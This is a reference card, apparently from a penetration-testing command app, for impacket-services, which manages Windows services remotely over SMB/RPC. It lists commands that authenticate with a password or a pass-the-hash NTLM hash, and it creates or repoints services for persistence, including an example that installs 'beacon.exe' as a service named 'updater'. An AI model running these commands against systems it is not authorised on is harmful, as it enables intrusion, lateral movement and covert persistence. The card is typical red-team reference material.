Impacket Remote Services

Enumerate, create, start, stop, and delete Windows services on a remote host through MS-SCMR. Useful for service-based persistence, hijacking weak service binaries, and silent execution paths.

Tool
impacket-services
Category
Post-Exploitation / AD Object Manipulation
Platform
linux
Requires
password
Protocols
SMB, RPC

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

impacket-services '<domain>/<user>:<password>@<ip>' list

Credential variants

The same attack using a different authentication material.

NTLM Hash requires NTLM hash

impacket-services -hashes ':<hash>' '<domain>/<user>@<ip>' list

Create Service requires password

impacket-services '<domain>/<user>:<password>@<ip>' create -name <svc> -display <svc> -path '<binPath>'

Start Service requires password

impacket-services '<domain>/<user>:<password>@<ip>' start -name <svc>

Change Service Path requires password

impacket-services '<domain>/<user>:<password>@<ip>' change -name <svc> -path '<new_binPath>'

Examples

impacket-services 'CORP/admin:Password123!@10.10.10.10' list
impacket-services 'CORP/admin:Password123!@10.10.10.10' create -name updater -display updater -path 'C:\\Temp\\beacon.exe'

Tags

impacket services scmr persistence post-exploitation

References